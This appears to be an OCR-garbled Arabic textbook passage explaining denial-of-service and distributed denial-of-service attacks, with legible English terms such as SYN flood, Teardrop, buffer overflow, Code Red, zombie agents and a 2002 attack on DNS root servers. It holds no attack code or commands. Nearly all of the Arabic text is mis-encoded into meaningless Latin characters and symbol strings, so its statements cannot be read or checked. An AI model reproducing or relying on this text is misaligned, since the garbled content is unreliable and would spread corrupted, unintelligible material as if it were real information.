q\ jAjj .S-^J f£L& <jJa^l jll £.1 jjJaVl (j-a <£jjujj (j^al^Vl (j-a (J^ila ^-la ol^fl ^aJ LL ■ u£ all (Jaxj d Laj ^lliVl ^a 4jI

idjjJjVI CllL^lLaJl ^UJ ^a j£j JJJ^IVI 4-JjL^jll <JLgcV1 ^ tiljV ^1 !a& 64_L13l A^ J^uudJ <JjL j ^aJJ 4^JjoJIj (j^aLkll 

IjJjui tilUfc .I^Ila^J ^aJ V 4 ^ (j£l j ttilli (j-G ^j'q^Ml CjjjS ^aJ (j-a j^ L>^ jffi £7* J*^ *O^0 ^ j J 

oAjAc f il Ala ^atiJ Igil .<LdAkll (j-a (jLa^pJ! ^a daJ a£jjuo31j ^aLkJl £-3 j-a .tilajLk-G I jjoj! 4£jjuoJI CjULoO A^jJ t^ULi ^ ^; Axj 

^ U ^il Aal .Uiajl ^ ^ aJ V ^^IaslSI tilli^j ;L_JJj3l £3 j-g <J jj^ jll tilj£ aJ V J ^ id (JS ^aA^J <jl (j^-aJ V <^ill <J J 1 ^ail 

.tik all tilLc 

tt^jaj^U ^jSl j .AjLi^Jl t^llS (jc ^Laij^al 4_laA jll CjUlkll ^alaall ^jJjj!ill Ac I jS £jJa j JJJl (j!>Lk ^ lA&La> J jl^J tiljj 

6^ cJ jL^. ^2 . j^>fi ^ jt^I ^j^> l5*^j ^ & " > " el) - * C5^^ j ^j^^ ^--^ < te5 -5c- jji*JI cl£^ *^ j ^ l$il£ ^^jll (Traffic) JJ^>*^ 

tilUA jl jAjj (jSlj (j-aLaJl 4-}La^Jl jl^?J J^l <-ajUlt Ig^l jA] ^aJ (j-aj 4£j^Jl ^ jJJ^Ji till JjojjJ ^jII j^L^aAll C5J^^ 

V ^ cill^V! ^ (Denial-Of-Service (DoS)) i> ^j.^ jl til jJcl U£ 

^ J^)^^ * u ^ ffi J 6^jJa jll li^ ^1 CllL j C flj£ ?^11q JJC. j lilsLxi till <J3 (jj^J L- fl jjoj ^^jll CjS jll (j-G ^a£ filluLO cJ^^ ^ 

?Ua^Jl (Jj^la (jC tiL <jL*aLkll ^a^l ^jljC-U clulS ^aJ (j>»J 6^ <J^aLaJl ClA^nJaJ Jl^. 4j| ^al 

aSIc) CjIa^JI j .DoS j^al^^U jl t (Denial-of -Service) Cy* <jUj^J! CjIa^a Jj^ c_jU£3I 11a 

^jjs dii^ ^Distributed Denial-of-Service (DDoS) attacks 'CjU^II ^ ^nx^ J&)!\ .1$** J^U^I 1^ 1^ 

^jlJaj (^ic l^sujjJj ^jolLq ^a AliHl A\ JJ jjU^ll 100 6 000 jffi cJ^^ cCjIjjuIslII L_ala jjj 

j id\ a-s^W fti^l ^IaxIojVI 4jqj^ Liajl ^alsu j .^j^JI aj^I I^a til^L^j DDoSj DoS C_jlji3l liA I 

AjJa jjlill djUl^^yi il^jl <c jjoij ^IxjII 4_iiL£j tl^jL^ (JjIixJI ^al*jj tt^Jj^ Aic L^jlx J^IxjIIj ;U£-<ui tilli (jj^J Ui^jc 

,^1^1 a\\ 

:(Denial of Service Attacks) ^U^aJI <> o^j^l ^Ua^ 

Asu Laic jj^.Vill Ia^jjjIj j I^jAjuj jl j ^dij^^VO ^^J'*' 1 (J^-^ £y* C_aL<L^Ji JAc AjI^J ^J^-^^ AjAslII CjA^I 

.DoS s * j> ^^ (Denial of Service Attacks) "^^Jl CjWa" 

uLjaLlll 

Asu ^jc(ciijjljVI) a£jjoJI <>^.1^<J jjj^IVI (jiblxil j <jj^ljall l^ja ^^jj l— cj! A^fcW a& jjou cJ-oxj .(DDOS Attacks ^^-^ 

lA^l ^^Jl Cjfljlt ^ A^jJ V 4jt£j 6<ifxill (j^Vl ^Ijf^ (>» ^^J^^J 6 ^ J^ 4 - tJallaJ^VI li^J IjJaj 

^ajli ^.I^aII ^jU <iaLaUJ aJJ ^LdAkll t L— iLd^A tAjjjuoll diljUill A^Jjoj jl JjuJI Cjl LlAiLa Jjuo^ (jjAj J^Jl lAA ^aJJj /'dljjljVl 
(JiLa ^.1 jJJ ^alc (J£ju1jj .4_l3j (J jj^a jll (j-a J^l ~ lalud^ ^1 ^laJ JlllLj tiL ^aLaJI J^ JJ^>^ (J^ ^ C3^"M^

lal^Al t l— Lft J ^cjJaill 4_La.jxi Jj CllL a j Igil La£ tdbJa-a SjJfl ^1 Jj£l da^al l^J jS jl Vj ^\ jcl ,lLa CjLa^JI 

(Jj^aj ^Ld^Jl jxa jLaj^Jl fil ^ ^^c. Jajuj jIg jl j-aVl J 4_j^aj^a^J>Jl (illjl <uuj 4^Jjoi J^ijj .AjjL^J (jlal jC-V 6-j J 1 ^ Q/ \J 

.2004 ^ t> J ai J %679 U ^Ujj 2004 ^ t> J jVl J ^ 927 J] 



?CjLa^i) jja jbaj^Jl CjLa^A La 

J (j^aklLj jnjmj L_J jLujVI I^J-d j l(pW^ a£jjuJI j£3 j tAjj^ dbuJ c_j jLA£ (DoS) ^t*^Jl c> u^jaJI CjU^A 

4ij Jail <£l<iVl j-a j m <^l\jual\ Jc J J & >^ (JjSJ J-al jVl j diUllaJl j-a cJ^^ *^ J (J^J^k (*J^ fO^ 6 ^ U' 

Jj J jaoll Jj^»»in axj ^ (Terminal) ^jUl J ENTER JL^VI j j Jc U^l r jAu jL>Vl li* Jc ^Lku^ll j 
j^jja c al^aj jl L_j jLojVI jl J ( . ujuJI j .cJ-a*-^ el al ^ jl s j^-^-Vl j-** j^* ^ j^t ^-W^j^ j Log In ^yMI 

j& j i JjlxjaLill ^UaJ j-ajJa St^VI Jc- L_fl^xjl3 ^jjJ jj ^.^J ^jU^VI A^a* ^ ^ ^J^J JL^^VI JJ (jl djUi^kl! (j-G (jLaj^J! CjLa^A ( ■ ull > nl 
obVI L^jsull ^LaJlsLxJl 4jUr> C5 ic £3JJ-a L_llia ^jlj Jjll I^A Ls lc JaiuJaJl <L^a! ^AJj .6^lc <Jlc ^iijj J J 

^jjj .AjaLJaj 4jaJU^ CjUlJa c ^iti j^la jj6 ^JIslxJI <alla %100 ^^^>>il L^J^ ^ J ^cjjILJI jl) 

L_ALall l^ja L-j±^LiLj JJlj 'SYN-ACK jl^ 3 !^ <!^JI J t ^Uaill ^ jijj j^l) SYN ^l^kiajU j±\ 

£5^J <jL^JjojVI <>— iAaJ ^aJ lij ^JIj^jVI ^-laj] ^\ m ^ ftJJfl j 'Op-* (J j^ J ^ cJj^ * ^ (*J^J 'U^*^ IP ^J^ J^^ 

4 j£ a a jj£l jLaJjU ^ig-xJ! ^ajflJ '(J^JC-VI CjLa^A J j .<J jVl ^Uaill lA j^j^aJ ACK ^ J^ J^ UJ^ ( ♦ J t^-ftJ^Jl 

jV Jjj j 6 J j^JI J SYN-ACK ^ ^j^j L^LjaJI ^Uaill ^ jLj IP ol?^ ^l^iaiU SYN ^ c> 

.6^J^ jL^ajl fit Ala 4Jl JIj Jc <JJ^3 ClAjiklU Jj^Jl ^ 511ft! Jj l£^JJ tAjjUa^ll ACK r* J^ J^j!^ ^j^ ^ 

(j>»jJa jAA>lklaui]i CjUI > Jj (J J^^ll <JJ^1 ^J^J L^xiljjJ g A\ ~ l^loaJ Cilia tCjLd^Jl ^jUijaJl Cjl j^.1 ^ ^aJ tilll JA 



^jjjUc <LaJlx^ cjULqc. jW^^ Jj ^u^J ^ ^ 3^ fQ^fl J^j^ ^— "Teardrop ^-^Wl ^j^JI" djl a-\^\\ ^ j^.1 
JLk^j jl <LaJljL^ j*\ j\ cJLujjj j5Lk ^j-ft JjxjuHII ^Uaj J l^joiij <^JU-a3I 4\\ac* (jljc-j 4-i jIujI <A\\ \$ a 4 JlftlUj b J jj-^l jWr^^ J^ IP 

(Jjixjaul! ^Uaj qa\ >i dj^lkAxJl 4_^Jlx^ CjULqC. ^ jSJ V 'Bllffer OverflOW (v3.-- lS^^-^I ^-laj <J ^ojujJ Uui V jia J^^) ^J^ 3 
Jj (_^^JJ t-a-a (l^Lxjujj ^xlaj j dlfl jjuj jjfLLa diUi^k^ J Code Red e-tj-a^ ojijjaJl jjj JJ^ J* > J ^*1uj1 6jsu3l ^^A j) lAAj^aJ 



[Figure: Malicious Traffic vs. Regular Traffic. Caption: Malicious traffic takes control over all the available bandwidth.]
^)JC jJ^I^)ll Jl ^LalaiVI 6L_lJj3l CjLa^a <aJ JlLd 6<C jjjuuJl <iajauVl (J^asu Jjllasu j& (DoS) 4-a-^Jl ( ; f (j^ c q ^ ^

(DoS) 4-a-^JI (j-« lA - *^)^ J*^ lS'^'I- .^^2kj ^iLd AjjojI^)3I (jLuJI <Jj^I jj jl t Jjj^-<JI ciLl > <JI j-^l tdijjSjV! 

jjc <jLacL ^U^ll jl t4 Ijt uoj ^Isu ;UJa^x» t^Uaauo 4_l*_^Jj t4_LoC jll L_fl^Jl JjLojj cJ^jj (j^O^ ^ 

(Jjojjj ^ig_xJl ,L_fl^Jl ^nlaJ (Jkb jl L_fl^JjaixJl jtg-^. Jc L_a*jJa3l -lataj <j!)lijjuil J <J^" ^- c 'JJ J ^ b(i 4_}1aC <J^.I,Hl3 0,1^.1 j <L Ja 
(jlaxJ cill^LujJ jll (JjLuj^)3I (J^jV l£^>^ ^^A 3 <^-^ -O^*-* c flxj^a (j>» llflJ i jll j 4 m a <L JaJ ClxjJaj AiilS JjLuij 

Jl U j 66j£li3l j (CPU time) <^J U ^31 j d£j (.(bandwidth) 4£f^l <jUaj <>ajc ^-i^ll J ^ jl 

l$j!>LaC jLja^.1 \ g j£ V t^lj's JjJ-aJl J^ J^g^ <J-gIxj13 ^LfcJ^ ^^J^ 4-^f^l J» t jl^ll 4L_fl^Jl J^nlaJ 

# (jjJC JjuJI 

4_Ai£]| Laj £JJj^ jj £xa ?l*la> 4_il Jc S JaJjuJl 4_ilc ( . ^\ * all (jli <JjLui^)3I (j* (JjI^JI ^AslSI li& Jlxi .iJ jlil t^iialU 

^Ig-xJl jtg-^. (jl (^^-^J I^Aj .L_fl^Jl ^jl j-a (jc (jl A-iLlS ^ g II (jj^J (^^J . J 1 ajVI A£jjuj (jjUaj (jia^)C. (j-d ^)Jj£3lj 

J ^ (J>»lxj3l (j£-GJj 4A£jjuo13 AjJ^j]| 4_nJl jl 4L_fl^Jl (j-d Jj£l JJJ>JI ^^)^- (j-* ^ ^ ^5^* UJ^ 

jjal J^ .JjLoj jll ^ ^jaxJI cJiL example.com ^ (DoS) u^ 1 Aa3 u^W^^ ^ ^j^^ u^^ 

tilti ^ jj ^.Ij jl^ ^ JjLoj jll ^Jjj ^.l^JI ^ jT > ^il l ^ to jjsj ^ jl^ I^jJ example.com 

.^j J example.com J! Jj^- j J f** ^ 100^000 ^ lP 3 6 u^j j'j^' 

(^a^ 4_L^j Jc (jj^Jj ^ JaJ ^cllx-d l&J^ 6 JllxJl J^f^ (J^) ^ CjUjl^l Cjli (jj^J (jl (j£-<uJl (j-d ^ J^-jl CliVI (j-« ^Jl (J^ (jVI 

(j^» (jLd^pJl 11a .1.^1^ 4_i^jJa3l (jC ^JJJ (jl Jc Sj^Ui (jj^l <*-fl ^JUJ 6^JjoJI ^I^VlmVI £A j^^l (j-d A^Jjai J£joiJ lat-d (j^3 j 

.(distributed denial-of-service (DDoS)) <^^JI 
;Vjl . l^jisu ji&l DDoS ^ o^j '^j^VI 2^1 ^ djUlAxJ I^j^j u^j^j DDoSj DoS 0* 

,<-<i^Jl (jUaj ^J^- a 1*^J (jl (j^J (jC ^aill (J- 3 *^ 'L_fl^A (_^l .IjjS L^.!>ljaj li^j .CjWI (j-« 1^. ^^JjujJ 

<j^aLaJI '"^'-^ Jc JjSix-Sl (j^J DoS ■} A 1 ^ ^ ^ CjIj^VI (j-« ^AslSI (jV 6<iaJjudJ CjVI (j>» ^^J^jj ^' 

C^Ti\ (j* cilllA .1^ Jlxi JJJ^a (3^ clA^J lg-*l'^"'V JJ^^ ^ J^VI L-llSaJJ V .5-Jj^j^3l C^jC. J <jj^alji3U 

^ 4(djUi jIslxJI d^A <9Jjia c^j) ^Vl Jc Ij^li L * a ^^ (jl^ .^I^aII l$J±\ ojj-d Jasu 

^>l ikU ja U^iisu ^jjj ^31 DDoS o^*^ <^^JI ^juJI ?(j;iijjJaJl lOO'OOO u- 0 UiUJl (jlx»j jll CjUIj^VI 

^ ^ J)*^&\\ <JIjuJJ <JjlL<i .^Ja^Jl <C jjjauJl JjLoj^)3I (j-d Jj3 (j-d Jjl ja!\ (iS^l^LujI ^aJJ jjjauJl j^JJ Jc JJ^Jl ^^>^ 

Jc ^^)3l Ajliil l-jxj gall (j^a t^^c jjuj iaLau Jl ^(^5-^ ^ j^^^ JJJ**^ a ^ aLq ^-<»!>L<i ^.jj V (jU^-VI (j-« J (ilU^a t4_jc. jJJI 

>( ^C^)jua3l iaLudill I^J \ - taJl jl (jj^ ^* g jl 

Ji5 ^J^l A^_a1I (j^ajl > ^aJI (j>>y j til^jLuoJ 

cijl^-ai j (jiajbu jll (jjjUll (j-o <c j^-^ ^ (jl j ^jojLluj tiljl cJ^^ .(W*^ cJ^^*^! t . it >^tll (j-o DDoS liUJ Jc til^cLoaj 

Jc <J jj^^JI (jj^j jjuj ^jj^ .'S^^j^ Jj^j J^jV ^SjJI ^l^jl J L_jjlaVlj ^l3A^VI (j>» ^ cJ^ t * a .^ ^* 

JLojjU tiL^Jj>» ^ala lili ^jLuoll J <JjLuj^)3I (J^asu ialLaj] ^JJ i u j (J^iij jjuj (iL (j^aLkJl ^^>JI (jj.Vu i^i J ^ajJ (JjLuj^)3I (j>» j^i^l 

l ^ ^3 D^jud^d ^1 ^IjljaJ^) (jl Ldl (j^^J S_5^*3 (j^-3 6, ^^)^l (3^^)^ (j^ < *~ J ^ C '^)^ 

dljl^ lil m lL& jll (j-d J^^JI ^cUial Jl i£^Jl 6 ^JJ C^^^ '■^O^ JJ^J '"-^ L>^ J^^^ UJ^ < — * '^^C-^f^l Jc 

4-lAlj^ll djUllik (jl 6(jiajliil3 jl <JjLoj^)3I (J^asu (jl^ aJJ > o 4^.1 j ^ajJ <j!^L^. 4'\-\\\ t ^ ^1"^ aJ Uui ^)j£l U-<ijJ lAlito jll <JjLoj^)3I 

l^Ld ^1 j CjIc jiill Jc ^ jl^i L^jjUa^ll (j-a ^1 Ai^x-d j ^£U3l <C jjoiJ (j£-oJ V iillil 6 JjjS^J dilc jilll J>LaJ jll tillS (j-d jj£I ^^Jb 

<-<i^JI (j-a (jLd^pJI ^a j^-A ^I^^U I jAl ia^a ciLi j> ,cijlc.^)ii3l ^ (jl^ail 6^1^. 4_j^ja Jc L_flii dijla 6A-i&!j£3! Jc ^ jli^i 

/ViU^l UjujU JjSj ^ ^ill tiljc ^ac Jl (jUj^ I j^IS (*n^ t^ljlr. J^JI ^JUI J (DDoS) 
;l^-Lujjj jll (JjLuj^)3I S^Uj ^UaLouj (j^j j- ^ (j^j '^>^l ^^>j <Jc ^Ijjuj (j^j cJ^ Lu^ ?tiLuiij (jc ^li^ll <J*ij (jl tilj£ liUi 

(jjjLill (j>» ^j^aII ( fljia jj . JjLoj^)1I (j>» j^^JI ^A^ill I^a J cijlc^)ii3l -ij^j -ijjj c U» tilj£3 j (jj^cL.a.ft3l (j^ ^3^^ j» 
^ "i^^j tiLi j> (jl (j^ J _cijlc^)iill (j^aalli Jl (_£^jj Uui ^a^ii (jl Ale ( . laj <j| el li^ c qK^ 4_i^3 j ?<JjLaj^)3l (j-<i l_jIaM3 

(Jjt^. jl^xi Uiajl (j^J ci^ ^ <j^LiJl jj^ aall c fljlSj (jl (j^-^ W^!^ '^^-^ (jJ^cLaixJl (j-d ^3^^ c 

<JaLaUJ ^aJ <^Jlstxi "l^^J ciL (j^aLkJl (j;iila J*l\ \ > ^>J> <J J^l djlilsLxJl ^I^JjojV tiL^j-d ^^A 3 (j^O^ 3 {j^ lS^-^I ^^>^^ ^ > H * <ft 4 ^ ^ 

djliix-<Jl (jjoij ^Ijj^J ^ jfi^ iAyftiW li^ (jc til* j>^i^ ^isu 1 a\\ ^ t^JalU .I^ajA (jj^ '(j^*-* (jjl (j* C-jjou] jll dAilx-all Ail^ <JaL^j 
(jjAil! o$*^\ ~& * Sa { ; illaSi s-L^Jt £j-<^ L ♦ ^^^^ <JL^j*Vt cJj^-^ cl)' <-5* .<*-it,jj t^^j jl^t

^ .lUxlt Jjoj JJ jt C_L^J ^tjJUj '^Ij (jUaJ ciLjj^k JJ^iij tit la^a J. at _1 ui li* .till JjLui L>* U^J^ 

c _ 5 ic Sj^lS jjc- j! 4jc.tj jjc. (Jj^j .iS ^^lilt -^O^ l . ^ ^ * cf-^ ^-^S 6t ^i cs^"* oj^c- .^^>^^ ( ; * cJ^ cJ^-^^ 

<JjLujj (J-g JJJ^Jt dljl£ lit .Igjlc <J jj^^Jl ^ (JjJC.jJ V (Jjill (JjjUII (JjLojj Ajjj^aJ jt 4j3tj-G j tclAjUa^Jt ^J^ j& .ti& JJ3 jJ 

Ljajl aJ ,1^. <iilJa ^jjlaLLft >JJJJ t ; u£ a <J jj^^Jt ^ tilj > ^ j3 <jl£ t4 qV^ a (jt,jL (^Jjojj-alt dllcjjjlt q^xjj) tillj* 4_i&tj£3t 

jL^jt Ig <OVimj ^^jll *^L>^ ( : ^ ^ * C-H 3 ^ ^^j] r*^ L)^ J ^ & ^ 1 11 j) ^ L — ^ ( ♦ 1 ' q * ^ cJ^-^^ ^t,^*hnt jU^-q 

^atlkt ^j^a J <LajUi ciL^l (JjfLjjai 4it ^^-istJ I^A j .AjjjII J;!!* tiL (j^aLklt (j^ *^J^ L - J W^ lW*^ '■^O^ ( ; & ^ * jl ^ jj^^JI 

<jl£ tit .(jJ*^o ,JJJJ cJ-^^ L£^J "^D^ L>^ ftiLuall CjLlA^lt lljaal] '■^O^ ^ ( . ^ (J^ L_Lil^Jj -l^)Jt 

^J^)i3t ^Ij^I ~\ ^lui\ ;<illi ^^ic .^fUU (JjuaflJ L_fl jjoj ciSjJ^jlt ti^ ^jli ^L^Jt ^lA^. ^ (J^-^ (JJjMiV^j ^jj^J^O tiLi ^ 

^alk ^j-d (ililt 4_xi^li3t 4_i&tj£3t (JjLujj (j* ^jj^ Vir-- Cjlc^iilt (J^asu ^IflJ ^jl ^^.j-<Jt £yc& tillil tUi ^ ^Jj S^^a^o jjiC. ^t j-<Jt Ij l^j] 

.A^^lt ^JjJt 

^jAxJt (jc !>Liaa toilet ojj^A^lt tillil <Ui5L<ui jl^. j> 4^. j ^^ic _4 a CjI^ jl > f >ri ti!U& ^j^3 j tUllld <jjjU£3t t j£i U»£ 
>iiJ J fijj^^l J ji^J^ .DDoS <-^^*^ c'-^' ^ '^j^V^ Sj^xII csj^Vt ^UJt ^ 

JjSj U UiUb DDoS -S £u >"V^ J ^AJJ^ 1 

^jl (j^J V iillil <£jjualt ^J^sUj ^LdUlt (Jjjoj ^jC 1 - taJl t^n^'ii t_fl jjujj .(_^^>^-Vt 6jLujVt Cjt^)juj^<» jJj tAjJjuJtj *^ ll^ It j^. ^sJ^Jj 



^Distributed Denial Of Service f j^* <-4^ 

Sj^t ^) (zombie agents) ^>j^ <^^j .(zombie agents) <^^j c^j ^ J^jj c> e^^^ ^ 

j (JjS ^j-d jLojjVt dal AL .^V^^t JJ jJJx^lt ^aUaj ^gJt (jU-ajt t . ilia jLajjlj ^ jSl! (\ £ J^l > ^ ^aJc ^JjJ ^j-d l^at jlkt ^aJ ^^jlt JJ jJJx^lt 

<jjlkxJt CjLg jlx-<Jt Jjujjj ^qj'q^ jj jjj^ti jji tl^SA j .^Luo^lt ^ V^j Aj^uJalt (Jjjia (jc Jjujjj I^ji jAjj (zombie agents) 

^t^Vt Ldt (JISj Jfl ti& .^tj dlSj jj jJix^lt oj^J>t ^j-<» ^J^xJt I^jS l_j jC. ja jjc. .JJ.JJJ 4_i^jJa <!t J^ ^aJ <it Ua Jj^^j Lq ,4_i^jJai3 

m <X* - ^alt 5Jt ^lajj t . UjujJJ jt 
^ DDoS ^ .^H*J^ ^-^J^V^ UJ^^ M1 J ^J^^ dlLa^aJt (j* jlxJl ^AslSI .(jLudjVI ^Lg^^Ijuj (JjllaxJ (^^^ J 4 aj'N j ^-^l jC c _ 5 ^- jl
jl ^a jJ SAaI (jjLjll (jl-^3 jl fi^l^juj ^ L_JC. JJ ^ du£ jj^JC (jl^ ^^-istJ ^ j .(JjjIUI jl AjjJaU^)3l CjLjUaII ^cjllj CjAaJ ^ -LaSS ^^-istJ 

<Jj3 (j-a dijjljVl <jjL^j3I ^JIac^U J^xi ? jl jlLVI j 6 W^I 6 *&J^^ ^ ■ J^J^ ^ <j ^ (jijuJt j j3 jla 

."U^l" JjUL (dsi fl lit DDoS 

jiull j ^2001 ^ y?* ^J^V> DDoS jjlaiJI ^ ?DDoS ^ c> la^^ uj£ u> ^ 

CjLo^JI (j-a 4'000 L>* ^ c *>*^ (.5^- clMJ^ O^j^ c ~ ^ .A£jjuo3I (jx» l^lla^.!>L<i (j£-aJ ^^1 JJJ-^I (j -0 * JJ* * *° 

^xi^L<i ^Jl (J;lx»J (jjj^ ^— jl^^)Juj (JJJ ^ ^jl^)JJ L_fll^AVI (j* 4-C ^iLa 4x« a AiJa t^Jjl ujI S^iiJ) ^* ^JjojVI 

6 j^la ^ ^3 U^^kl^l ^Jill 4lij]a3l .(dial-up connections) djVl^ilj (ISP) ^ j^-^JI ^ 

ild jjki <jla ^jI jll DDoS ^ -^^j ild chilli S .^1 jll Jal 4000 ^J^\ ^ Cixi j ^1 cjU^JI 
^ (j>i ^ '(--^j^V! (^^^>^ ^ FBI ^ 2004 j^j^ ^h^^ (*^^^ uj^ ^■^■^>^^ l>^j 6 u^*^^ 

'2001 jAj .2004 f^'j^ c_ijjaij aJUJI Sjl^kil jj£I <-G^kll o^aj . j^j^ uj^ 26 c> ^^Jl s-^ 

jjuijjfLLa ^a^l j^. (jx» ^1 C5 ic J jj^^JI (jx» (jjJC JjoJI (jj^^Jjai^ll (jx» Z98 C5^^ J^ 1 ^—^ J^JJ^^ ^5^* DDoS ^ ^ v ^*^ 

cjUij^U -u^k DNS .(DNS) JW-^ ^1 <jj1?JI 13 cjU^LJI aaIS ^ cilUA jl£ ^2002 jjj^^ 

.<K c^jjjj^U ^l^JI cjUUJI *UL)f ^^l.,n 13 ^1 j^JI o'±& j ^j^VI Cjllnkill (> j l_ijj3I 

(jl (j^J 6<J jJ^' *^J^ ^ J?^^ J-aloil lil . J^aa cJ^joiJ <--lJ^ 13 **\*\\ oi^ (jx» 9 .^—^J^V^ -^-^ L>^ (JjlaxJ ^1 <i!U& 

AijC. (j-d ^Aaajau> (jxi £fi! jll ^ l^. j-d (jl£ 6(JjjLuo£j 4(jloj ^lllxi (JjI^tM ^A^LujI (_^ill jj^AaII J^-!l .Clljjlj^U ^jAjoi L_j|^)IajJal lAaJ 
4 JjoiU^ J;iC. jl JjaiU-a cJ^^ ^ T J^> ^ \^r» J^JJ DDoS J>(S^ ^ I^qIa^LujI ^IjujJ JJ Jjj^ ^3^' '^-^ '^-^^ M ^"^J^l 

,^JI a Ak.jJ (jl ^Tjn (_^ill ^^ill jAj 



(DDOS) 4-»-^t ^.jaJk o^ljfrt 

a J^-j ^-1>->UJJ (jlal jcl ixJjl (ilLiA ,*L<»^JI t . i-v ^ ^ j-^ ^ (j* (jialjC-VI t flll^J ^3 ;L_fl^Jl jl^JI ^1 bLlLojl 

(j\ ^1 J jj^a jll 6J^3I ^a^C 

-(> 5^lc. jjc. cJ^J <lilaJ A£jJj| pbl 
(Understanding Denial Of Service) <> cMjaJI cjU»a 10.2



dASijill Jc diij^ jll cA a*\$\ \ fk*A jjSjII j t J£j^3I j J i afca^ j& (denial-of -service) <>»^aJI iy* cJ^ jaJI ? jaA 

jj3 jJ Jc- ^Jlajj jl tLfc JjjujI ^Ij^JjuiI ;^aUai3l ^L^jfll Jj (jjJLjuiJ 4_ljjj£]VI ^ajljaJl <J (jjllajjlxJl ^ia^I^xJI ^Jn* a m jfl jl±/&l\ S j^_^.lj 
Jc SjVhm^I j tA-J^Lall CjLg Jx-a jl (jLaJJ^I dlUjUaJ ^13 J <3jjoj (jj (j^^W^ .L^-gIa^LuAj ^gj ^-<u.hJ (jl ^irTn V J^l <La,laJl 
J _ljL^jJall & jg-a.1 Jc ^a (_£ jl^ ^ JjlistJ jl 6L_JjJI C! ll «s q > ^ AjjjoiJ t^J 4_j^Lk]| djUUJl jl ^a£J <j^aLaJl £c-gI Jill C-UJJj] S jg_^.VI 

.^ag-* ^IjJ (jlajC. J Jj <J jaJJ (jl (j^-aJ ^jl ^ l^-jl Jc- (jjlA^l^Jl <Jj3 (j* Aijl^xJl CjVI pJjVl ^aJJ 6(jLl^.VI (j* 

^a jaA Jj ^Ig-xJl (Jiljj ^aJ . J jl 6 jVl'N ^ja»Xi j& P^lc <JJ±kj| SjVhuiII j JJ Jjjrt^l 6 jg-ai (j-G J^ ^L^jSl ^DDoS J 

tlgjfijjuJ CLjIjUj jj V .(jjc jjjob<Jl (j^^jjoiAll <La,lkj| ^^sil (j>» CjI^jjoJI jl 4_i^jJa3l CjVI ^1<J ?L_atL^ L_fl^A 4_3^3 c^^ilj ^-juoij DoS 

^.^^LulU <La,JJaJl ^aJ^ (jC L_fl3jJJ A Vil > kUJ 4_i^jJa3l (jl L— Ll^ ^- j> siaW JJC. <J jj^ Jl V J tUL^jJall 6 jgai Jc ^^^jui J J^*J ^aJJ V J 

cj! J 4_i^jJa]| <j j^*JI cJ Jl *^ J ■ jjj - ^^ ^^>^ J^ f j'M^ cJ^^*^! J jxjIa <jV ^gJt-iiL 

.^aj^Jl J l ^^lmj c^illj t^l^l JjS ^i^jll ^aJj ^il jlkl <aJ ^ill (jJj^VI J J^jJa^l l ^ tilliA ^DDoS flOOd 

.^ILj^xJI I^J j jj^ll t La^jtilSI <J!>lk (j>» t<j ^- ^ ^ jjc. J jll 11a tdiVl^JI - a J 

^a * II \ A\ la Jais ^djjaij d^Ic 4_j| £^>-<J! U»^jc L^a j 1 j cLiJjudj ^ 4_i^jJa3l Jc ^Ld^Jl (j-d (jLa^aJ! ^jjjUj (jl (j^ 

^jl^JJ m 4jLA jJl Ujl;!^ (j>» \ A£ A l^3^ **— L — J ^- Xi '^ ^ £U rt\ m \ ^A^A (jj^J (jl (j^-<^ ^fwJl ^ * l^Lul^ (j-d (j^J 6 ^ aj ^ 

djU^gil ojLjaJl jUiVI Jc <Sl<iVI LpaxJ Jj Uu3 .AjjojLojVI dilxi^kJl (jiasu jj3 j!i3 j AjjL^jII JL^cVI 5-Ij^.V ClijliV! ^ 

.<Xi^kJl 

(ilti Jl J jll (jj^^jjoiAll (j^j UiAic. Jaia JUJI ( -lu^I dijjjVI Jc ^Ijl lS^^ (j - ** UJ^ *^^ L djUi^k ^Skl Jll ^1 ^^31 

ja!\ Jl ( \\ ^ q > <aj (j-d I j*^ <uj ^3 lil Aj^Iasl! ( . v&\\ ^ij ^ j£ V t . n^l ^iJ ^3 ^ tJllxJl J^f^ Jc- . t — J^^JI 

I^A j-aloil UJUa SjLuA (^x-i ^1 j-<Jl Jc L-laLa ^a .dljjljV! ^SliA Jc (jxi dil aalall ^IjJjj 

Jl <J jj^ jll (jxi I jj£ ^a] (jjill (jjbjl ?^VI Ja £3 ^<JI 4jt-djaiJ jjjJall (J^aJj jl <iija dil Jil ^a j^^l Uiajl ,^a j^(gll 

(j* cJ^J-^ J' <^^^C L_J^. J Ajjxj^ ^3 djjjjJaJ jll ^1 ^<JI .^-Ajaial La <jLacl I ji^-lj (jl ^^.J-<JI (j-d 4jjlla-<Jl ^La^iJl 

_(Jj^Lola]| J (jjj>iLai>Jl 

J^C Jc CjbljjVI AaIxj , jj^a^J] ^jU^lcl (jia^JL! (jj3 jjouJI Jj3 (jxi ^i^J diaJl j (_^^)J^3I AjjlikVI ^1 J-<JI 

CjI^jIslSI (j-a D^jjujLixi 6 jl > >A (^^-Lu ^3 ^<JI I^A (JiLa Jc <>i^Jl C .^9 j-<Jl ^ ^ 9 > (jla^JU (j^j^J (jjill (jj^ Aaajud^ll 

Jj ^jl} 4_nstjaJl (jl^ ,^1 j-<Jl Jl <J jj^ jll jj£I a1 j$ > oJ ^!>LiJL!l S^Ua J AxiVI lS^J 3 (jj^J (jl (j^-aJj '(j^ jjoixJI (jxi 

,Lljlj!>lcVI Jl 6JJujLlx» 6jLuA 

(J)NS) ^—^J^V^ LS^ 0 C — J ^^ a ^l ^^-AujI ^aliaj i JllxJl (J^f^ J^ ^J^V^ ^? a ^ ^ ^ ^ ^ ' ^^-^ J-^l lP 3 *^ 

Jj^j^jj^ J (www.example.com J^) u^V^ ^ c> J^^j s^j^^ ols^ ^ cjUJxJI j^jj 

Sjjli ^jjSj! DNS J^ c5 j^Vl cjlgn Villi (> ^jaxJI j c_jjj3I cjUq^u .(192.0.34.166 lS^) (IP) ^ JjVI 

1 ■ UjudJ 4jL^JjujVI (j^J V ^-jli 6*L<»^JI L-la^ DNS dbJa^su lil / jJla^SI (j^^JjaixJl JjS (jx» CjLd jlat-<Jl ( . lla Jc 

(jxi ^aC. Jl Jc tl^lA^jJ (j^J V ^JJjUc (jl C > UjuoJ l^Jl jj^ jll (j^-GJ V ^1 J-<JI (j-« ^JAslSI (jl <Jc ^JJjlj I^A j 6^j| Jl <J-<^J! 

t^jj^l 4f\<\\\ 4-uA\ (j* l*j^ DNS J*^ ^ J ■ JJ>*^ t° J^^-*^ ^JjVI Jc^ ^1 j^ll cilli (jl 

.(jljlk^U <jJajC Uiajl Ajj^jII 4^lA\ (jx» ^jLdAl <Jsj V jll ^lakll (jxi lA jjc-j 

